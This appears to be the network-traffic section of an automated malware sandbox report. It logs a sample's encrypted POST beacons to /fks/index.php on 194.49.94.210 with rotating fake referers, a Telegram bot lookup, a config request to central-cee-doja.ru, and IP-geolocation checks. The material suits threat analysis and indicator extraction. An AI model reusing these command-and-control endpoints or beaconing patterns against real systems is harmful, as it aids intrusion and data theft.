Nov 18, 2023 10:02:29.254997015 CET	1027	OUT	Data Raw: 14 6d 66 0e 32 17 16 83 fd 7c d7 51 76 a6 6b 5c 42 f4 f6 53 bb 1c 1e 35 90 9d 37 da f5 da b3 90 ee dc 47 bb bf 85 69 d3 0a 05 7d bf 7e e8 57 fc 6a ff 8c 81 33 4c e2 82 3f 1c 62 7f 1f e1 68 05 94 04 50 e7 29 af a0 d5 f3 c9 39 df 28 fc 82 2c a0 47 Data Ascii: mf2\|Qvk\BS57Gi}~Wj3L?bhP)9(,G^X\QElK;ob,LPh,T #]]SV\|g4xi.1XXDh&j[8j#[ I82u90>B4ilc?~d^-d;(241yKk
Nov 18, 2023 10:02:29.556313992 CET	1028	IN	HTTP/1.1 404 Not Found Date: Sat, 18 Nov 2023 09:02:29 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 414 Keep-Alive: timeout=5, max=94 Connection: Keep-Alive Content-Type: text/html; charset=utf-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6b 73 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 31 39 34 2e 34 39 2e 39 34 2e 32 31 30 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fks/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at 194.49.94.210 Port 80</address></body></html>
Nov 18, 2023 10:02:29.686839104 CET	1028	OUT	POST /fks/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://pgiuvevlnge.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 278 Host: 194.49.94.210
Nov 18, 2023 10:02:29.686892033 CET	1029	OUT	Data Raw: 14 6d 66 0e 32 17 16 83 fd 7c d7 51 76 a6 6b 5c 42 f4 f6 53 bb 1c 1e 35 90 9d 37 da f5 da b3 90 ee dc 47 bb bf 85 69 d3 0a 05 7d bf 7e e8 57 fc 6a ff 8c 81 33 4c e2 82 3f 1c 62 7f 1f e1 68 05 94 04 50 e7 28 af a1 d5 f3 c9 38 df 28 fc 87 35 95 7f Data Ascii: mf2\|Qvk\BS57Gi}~Wj3L?bhP(8(5Mh0c6brE#d:]9 =(ESfg%(LcIc{L7?R8x3Fu)f^1dtGZhYT.P99JTAWtr373nw/vhr?&V
Nov 18, 2023 10:02:29.987898111 CET	1030	IN	HTTP/1.1 404 Not Found Date: Sat, 18 Nov 2023 09:02:29 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 45 Keep-Alive: timeout=5, max=93 Connection: Keep-Alive Content-Type: text/html; charset=utf-8 Data Raw: 00 00 87 48 0e 3e 83 15 b2 bb 39 c8 39 c3 24 4a 59 cd fb c1 05 e1 40 b3 f7 6b 6a 82 c9 40 a5 97 72 8c a5 3f 5e f9 12 a0 09 66 c8 41 87 Data Ascii: H>99$JY@kj@r?^fA
Nov 18, 2023 10:02:32.254563093 CET	1525	OUT	POST /fks/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://jlkdrqfnhbbwddxd.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 209 Host: 194.49.94.210
Nov 18, 2023 10:02:32.254626989 CET	1525	OUT	Data Raw: 14 6d 66 0e 32 17 16 83 fd 7c d7 51 76 a6 6b 5c 42 f4 f6 53 bb 1c 1e 35 90 9d 37 da f5 da b3 90 ee dc 47 bb bf 85 69 d3 0a 05 7d bf 7e e8 57 fc 6a ff 8c 81 33 4c e2 82 3f 1c 62 7f 1f e1 68 05 94 04 50 e7 29 af a1 d5 f3 c9 39 df 28 fc 9c 39 ab 33 Data Ascii: mf2\|Qvk\BS57Gi}~Wj3L?bhP)9(932NYo4s$ir`KFW+ZnSM+ZSNM^Lc$zQBj}[cU\VvDvPm0GR}T&;rlF
Nov 18, 2023 10:02:32.555654049 CET	1526	IN	HTTP/1.1 404 Not Found Date: Sat, 18 Nov 2023 09:02:32 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 414 Keep-Alive: timeout=5, max=92 Connection: Keep-Alive Content-Type: text/html; charset=utf-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6b 73 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 31 39 34 2e 34 39 2e 39 34 2e 32 31 30 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fks/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at 194.49.94.210 Port 80</address></body></html>
Nov 18, 2023 10:02:32.589163065 CET	1526	OUT	POST /fks/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://nwvpdxhgvgnlfy.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 298 Host: 194.49.94.210
Nov 18, 2023 10:02:32.589184999 CET	1526	OUT	Data Raw: 14 6d 66 0e 32 17 16 83 fd 7c d7 51 76 a6 6b 5c 42 f4 f6 53 bb 1c 1e 35 90 9d 37 da f5 da b3 90 ee dc 47 bb bf 85 69 d3 0a 05 7d bf 7e e8 57 fc 6a ff 8c 81 33 4c e2 82 3f 1c 62 7f 1f e1 68 05 94 04 50 e7 28 af a6 d5 f3 c9 38 df 28 fc d8 61 f5 63 Data Ascii: mf2\|Qvk\BS57Gi}~Wj3L?bhP(8(ac(VLUvaosK:-Yz02\|2H'yqPT,6^O`4ph@9He$D},O#DIp@RniwKL@BrUfz_7&8 o2Ny:#"D
Nov 18, 2023 10:02:32.890566111 CET	1528	IN	HTTP/1.1 404 Not Found Date: Sat, 18 Nov 2023 09:02:32 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 53 Keep-Alive: timeout=5, max=91 Connection: Keep-Alive Content-Type: text/html; charset=utf-8 Data Raw: 00 00 87 48 0e 3e 83 15 b2 bb 39 c8 39 c3 24 4a 59 cd fb c1 05 e1 40 b3 f7 6b 6a 82 c9 40 a3 92 72 ac a5 2b 5d dc 09 ba 16 3c f2 72 8e c5 73 b7 c8 ab 6a a6 92 Data Ascii: H>99$JY@kj@r+]<rsj

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
99	192.168.2.4	49739	149.154.167.99	80	C:\Users\user\AppData\Local\Temp\8427.exe

Timestamp	kBytes transferred	Direction	Data
Nov 18, 2023 10:02:29.660984039 CET	1028	OUT	GET /cinoshibot HTTP/1.1 Host: t.me Connection: Keep-Alive
Nov 18, 2023 10:02:29.957020044 CET	1029	IN	HTTP/1.1 301 Moved Permanently Server: nginx/1.18.0 Date: Sat, 18 Nov 2023 09:02:29 GMT Content-Type: text/html Content-Length: 169 Connection: keep-alive Location: https://t.me/cinoshibot Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.18.0</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
99	149.154.167.99	80	192.168.2.4	49739	C:\Users\user\AppData\Local\Temp\8427.exe

Timestamp	kBytes transferred	Direction	Data
Nov 18, 2023 10:02:29.660984039 CET	1028	OUT	GET /cinoshibot HTTP/1.1 Host: t.me Connection: Keep-Alive
Nov 18, 2023 10:02:29.957020044 CET	1029	IN	HTTP/1.1 301 Moved Permanently Server: nginx/1.18.0 Date: Sat, 18 Nov 2023 09:02:29 GMT Content-Type: text/html Content-Length: 169 Connection: keep-alive Location: https://t.me/cinoshibot Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.18.0</center></body></html>

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.4	49731	34.117.59.81	443	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

Timestamp	kBytes transferred	Direction	Data
2023-11-18 09:01:58 UTC	0	OUT	GET /widget/demo/156.146.49.168 HTTP/1.1 Connection: Keep-Alive Referer: https://ipinfo.io/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.36 Host: ipinfo.io
2023-11-18 09:01:58 UTC	0	IN	HTTP/1.1 200 OK access-control-allow-origin: * x-frame-options: SAMEORIGIN x-xss-protection: 1; mode=block x-content-type-options: nosniff referrer-policy: strict-origin-when-cross-origin content-type: application/json; charset=utf-8 content-length: 1042 date: Sat, 18 Nov 2023 09:01:58 GMT x-envoy-upstream-service-time: 2 strict-transport-security: max-age=2592000; includeSubDomains vary: Accept-Encoding Via: 1.1 google Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2023-11-18 09:01:58 UTC	0	IN	Data Raw: 7b 0a 20 20 22 69 6e 70 75 74 22 3a 20 22 31 35 36 2e 31 34 36 2e 34 39 2e 31 36 38 22 2c 0a 20 20 22 64 61 74 61 22 3a 20 7b 0a 20 20 20 20 22 69 70 22 3a 20 22 31 35 36 2e 31 34 36 2e 34 39 2e 31 36 38 22 2c 0a 20 20 20 20 22 68 6f 73 74 6e 61 6d 65 22 3a 20 22 75 6e 6e 2d 31 35 36 2d 31 34 36 2d 34 39 2d 31 36 38 2e 63 64 6e 37 37 2e 63 6f 6d 22 2c 0a 20 20 20 20 22 63 69 74 79 22 3a 20 22 53 65 61 74 74 6c 65 22 2c 0a 20 20 20 20 22 72 65 67 69 6f 6e 22 3a 20 22 57 61 73 68 69 6e 67 74 6f 6e 22 2c 0a 20 20 20 20 22 63 6f 75 6e 74 72 79 22 3a 20 22 55 53 22 2c 0a 20 20 20 20 22 6c 6f 63 22 3a 20 22 34 37 2e 36 30 36 32 2c 2d 31 32 32 2e 33 33 32 31 22 2c 0a 20 20 20 20 22 6f 72 67 22 3a 20 22 41 53 36 30 30 36 38 20 44 61 74 61 63 61 6d 70 20 4c 69 6d Data Ascii: { "input": "156.146.49.168", "data": { "ip": "156.146.49.168", "hostname": "unn-156-146-49-168.cdn77.com", "city": "Seattle", "region": "Washington", "country": "US", "loc": "47.6062,-122.3321", "org": "AS60068 Datacamp Lim
2023-11-18 09:01:58 UTC	1	IN	Data Raw: 72 76 69 63 65 22 3a 20 22 43 79 62 65 72 47 68 6f 73 74 22 0a 20 20 20 20 7d 2c 0a 20 20 20 20 22 61 62 75 73 65 22 3a 20 7b 0a 20 20 20 20 20 20 22 61 64 64 72 65 73 73 22 3a 20 22 44 61 74 61 63 61 6d 70 20 4c 69 6d 69 74 65 64 2c 20 5a 64 65 6e 65 6b 20 43 65 6e 64 72 61 2c 20 32 30 37 20 52 65 67 65 6e 74 20 53 74 72 65 65 74 2c 20 57 31 42 20 33 48 48 2c 20 4c 6f 6e 64 6f 6e 2c 20 55 4e 49 54 45 44 20 4b 49 4e 47 44 4f 4d 22 2c 0a 20 20 20 20 20 20 22 63 6f 75 6e 74 72 79 22 3a 20 22 55 53 22 2c 0a 20 20 20 20 20 20 22 65 6d 61 69 6c 22 3a 20 22 61 62 75 73 65 40 64 61 74 61 63 61 6d 70 2e 63 6f 2e 75 6b 22 2c 0a 20 20 20 20 20 20 22 6e 61 6d 65 22 3a 20 22 41 62 75 73 65 20 43 6f 6e 74 61 63 74 22 2c 0a 20 20 20 20 20 20 22 6e 65 74 77 6f 72 6b 22 Data Ascii: rvice": "CyberGhost" }, "abuse": { "address": "Datacamp Limited, Zdenek Cendra, 207 Regent Street, W1B 3HH, London, UNITED KINGDOM", "country": "US", "email": "abuse@datacamp.co.uk", "name": "Abuse Contact", "network"

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	34.117.59.81	443	192.168.2.4	49731	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

Timestamp	kBytes transferred	Direction	Data
2023-11-18 09:01:58 UTC	0	OUT	GET /widget/demo/156.146.49.168 HTTP/1.1 Connection: Keep-Alive Referer: https://ipinfo.io/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.36 Host: ipinfo.io
2023-11-18 09:01:58 UTC	0	IN	HTTP/1.1 200 OK access-control-allow-origin: * x-frame-options: SAMEORIGIN x-xss-protection: 1; mode=block x-content-type-options: nosniff referrer-policy: strict-origin-when-cross-origin content-type: application/json; charset=utf-8 content-length: 1042 date: Sat, 18 Nov 2023 09:01:58 GMT x-envoy-upstream-service-time: 2 strict-transport-security: max-age=2592000; includeSubDomains vary: Accept-Encoding Via: 1.1 google Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2023-11-18 09:01:58 UTC	0	IN	Data Raw: 7b 0a 20 20 22 69 6e 70 75 74 22 3a 20 22 31 35 36 2e 31 34 36 2e 34 39 2e 31 36 38 22 2c 0a 20 20 22 64 61 74 61 22 3a 20 7b 0a 20 20 20 20 22 69 70 22 3a 20 22 31 35 36 2e 31 34 36 2e 34 39 2e 31 36 38 22 2c 0a 20 20 20 20 22 68 6f 73 74 6e 61 6d 65 22 3a 20 22 75 6e 6e 2d 31 35 36 2d 31 34 36 2d 34 39 2d 31 36 38 2e 63 64 6e 37 37 2e 63 6f 6d 22 2c 0a 20 20 20 20 22 63 69 74 79 22 3a 20 22 53 65 61 74 74 6c 65 22 2c 0a 20 20 20 20 22 72 65 67 69 6f 6e 22 3a 20 22 57 61 73 68 69 6e 67 74 6f 6e 22 2c 0a 20 20 20 20 22 63 6f 75 6e 74 72 79 22 3a 20 22 55 53 22 2c 0a 20 20 20 20 22 6c 6f 63 22 3a 20 22 34 37 2e 36 30 36 32 2c 2d 31 32 32 2e 33 33 32 31 22 2c 0a 20 20 20 20 22 6f 72 67 22 3a 20 22 41 53 36 30 30 36 38 20 44 61 74 61 63 61 6d 70 20 4c 69 6d Data Ascii: { "input": "156.146.49.168", "data": { "ip": "156.146.49.168", "hostname": "unn-156-146-49-168.cdn77.com", "city": "Seattle", "region": "Washington", "country": "US", "loc": "47.6062,-122.3321", "org": "AS60068 Datacamp Lim
2023-11-18 09:01:58 UTC	1	IN	Data Raw: 72 76 69 63 65 22 3a 20 22 43 79 62 65 72 47 68 6f 73 74 22 0a 20 20 20 20 7d 2c 0a 20 20 20 20 22 61 62 75 73 65 22 3a 20 7b 0a 20 20 20 20 20 20 22 61 64 64 72 65 73 73 22 3a 20 22 44 61 74 61 63 61 6d 70 20 4c 69 6d 69 74 65 64 2c 20 5a 64 65 6e 65 6b 20 43 65 6e 64 72 61 2c 20 32 30 37 20 52 65 67 65 6e 74 20 53 74 72 65 65 74 2c 20 57 31 42 20 33 48 48 2c 20 4c 6f 6e 64 6f 6e 2c 20 55 4e 49 54 45 44 20 4b 49 4e 47 44 4f 4d 22 2c 0a 20 20 20 20 20 20 22 63 6f 75 6e 74 72 79 22 3a 20 22 55 53 22 2c 0a 20 20 20 20 20 20 22 65 6d 61 69 6c 22 3a 20 22 61 62 75 73 65 40 64 61 74 61 63 61 6d 70 2e 63 6f 2e 75 6b 22 2c 0a 20 20 20 20 20 20 22 6e 61 6d 65 22 3a 20 22 41 62 75 73 65 20 43 6f 6e 74 61 63 74 22 2c 0a 20 20 20 20 20 20 22 6e 65 74 77 6f 72 6b 22 Data Ascii: rvice": "CyberGhost" }, "abuse": { "address": "Datacamp Limited, Zdenek Cendra, 207 Regent Street, W1B 3HH, London, UNITED KINGDOM", "country": "US", "email": "abuse@datacamp.co.uk", "name": "Abuse Contact", "network"

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.4	49740	149.154.167.99	443	C:\Users\user\AppData\Local\Temp\8427.exe

Timestamp	kBytes transferred	Direction	Data
2023-11-18 09:02:30 UTC	1	OUT	GET /cinoshibot HTTP/1.1 Host: t.me Connection: Keep-Alive
2023-11-18 09:02:31 UTC	1	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Sat, 18 Nov 2023 09:02:31 GMT Content-Type: text/html; charset=utf-8 Content-Length: 10856 Connection: close Set-Cookie: stel_ssid=cfbcfab6fb13df40fe_2376617241005059088; expires=Sun, 19 Nov 2023 09:02:31 GMT; path=/; samesite=None; secure; HttpOnly Pragma: no-cache Cache-control: no-store X-Frame-Options: ALLOW-FROM https://web.telegram.org Content-Security-Policy: frame-ancestors https://web.telegram.org Strict-Transport-Security: max-age=35768000
2023-11-18 09:02:31 UTC	2	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 54 65 6c 65 67 72 61 6d 3a 20 43 6f 6e 74 61 63 74 20 40 63 69 6e 6f 73 68 69 62 6f 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 74 72 79 7b 69 66 28 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 21 3d 6e 75 6c 6c 26 26 77 69 6e 64 6f 77 21 3d 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 29 7b 77 69 6e 64 6f 77 2e 70 61 Data Ascii: <!DOCTYPE html><html> <head> <meta charset="utf-8"> <title>Telegram: Contact @cinoshibot</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <script>try{if(window.parent!=null&&window!=window.parent){window.pa

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	149.154.167.99	443	192.168.2.4	49740	C:\Users\user\AppData\Local\Temp\8427.exe

Timestamp	kBytes transferred	Direction	Data
2023-11-18 09:02:30 UTC	1	OUT	GET /cinoshibot HTTP/1.1 Host: t.me Connection: Keep-Alive
2023-11-18 09:02:31 UTC	1	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Sat, 18 Nov 2023 09:02:31 GMT Content-Type: text/html; charset=utf-8 Content-Length: 10856 Connection: close Set-Cookie: stel_ssid=cfbcfab6fb13df40fe_2376617241005059088; expires=Sun, 19 Nov 2023 09:02:31 GMT; path=/; samesite=None; secure; HttpOnly Pragma: no-cache Cache-control: no-store X-Frame-Options: ALLOW-FROM https://web.telegram.org Content-Security-Policy: frame-ancestors https://web.telegram.org Strict-Transport-Security: max-age=35768000
2023-11-18 09:02:31 UTC	2	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 54 65 6c 65 67 72 61 6d 3a 20 43 6f 6e 74 61 63 74 20 40 63 69 6e 6f 73 68 69 62 6f 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 74 72 79 7b 69 66 28 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 21 3d 6e 75 6c 6c 26 26 77 69 6e 64 6f 77 21 3d 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 29 7b 77 69 6e 64 6f 77 2e 70 61 Data Ascii: <!DOCTYPE html><html> <head> <meta charset="utf-8"> <title>Telegram: Contact @cinoshibot</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <script>try{if(window.parent!=null&&window!=window.parent){window.pa

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
10	104.21.89.193	443	192.168.2.4	49754	C:\Users\user\AppData\Local\Temp\8427.exe

Timestamp	kBytes transferred	Direction	Data
2023-11-18 09:02:43 UTC	10418	OUT	GET //dd.php?id=1444 HTTP/1.1 Host: central-cee-doja.ru
2023-11-18 09:02:44 UTC	10418	IN	HTTP/1.1 200 OK Date: Sat, 18 Nov 2023 09:02:44 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=r1vQP5wzHNCpylxOZ%2FbV6WW%2B7Z6okc55Pr7ueqMF%2Fwd%2FfGgn%2FBaxLU4Ts4sonHiGlFy2lrBgwZWzFiKS50t6E9jD%2BvNVFKfNuza2g6MbO7AiLfnt7S%2BEwtMzQD1u%2FpXIbznDWxf%2F"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 827f09466d04eb6f-SEA alt-svc: h3=":443"; ma=86400
2023-11-18 09:02:44 UTC	10419	IN	Data Raw: 61 0d 0a 4e 4f 53 45 54 54 49 4e 47 53 0d 0a Data Ascii: aNOSETTINGS
2023-11-18 09:02:44 UTC	10419	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
10	192.168.2.4	49754	104.21.89.193	443	C:\Users\user\AppData\Local\Temp\8427.exe

Timestamp	kBytes transferred	Direction	Data
2023-11-18 09:02:43 UTC	10418	OUT	GET //dd.php?id=1444 HTTP/1.1 Host: central-cee-doja.ru
2023-11-18 09:02:44 UTC	10418	IN	HTTP/1.1 200 OK Date: Sat, 18 Nov 2023 09:02:44 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=r1vQP5wzHNCpylxOZ%2FbV6WW%2B7Z6okc55Pr7ueqMF%2Fwd%2FfGgn%2FBaxLU4Ts4sonHiGlFy2lrBgwZWzFiKS50t6E9jD%2BvNVFKfNuza2g6MbO7AiLfnt7S%2BEwtMzQD1u%2FpXIbznDWxf%2F"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 827f09466d04eb6f-SEA alt-svc: h3=":443"; ma=86400
2023-11-18 09:02:44 UTC	10419	IN	Data Raw: 61 0d 0a 4e 4f 53 45 54 54 49 4e 47 53 0d 0a Data Ascii: aNOSETTINGS
2023-11-18 09:02:44 UTC	10419	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
11	192.168.2.4	49758	147.135.36.89	443	C:\Users\user\AppData\Local\Temp\8427.exe

Timestamp	kBytes transferred	Direction	Data
2023-11-18 09:02:45 UTC	10419	OUT	GET /?output=xml HTTP/1.1 Host: ipwho.is Connection: Keep-Alive
2023-11-18 09:02:45 UTC	10419	IN	HTTP/1.1 200 OK Date: Sat, 18 Nov 2023 09:02:45 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close Server: ipwhois Access-Control-Allow-Headers: * X-Robots-Tag: noindex
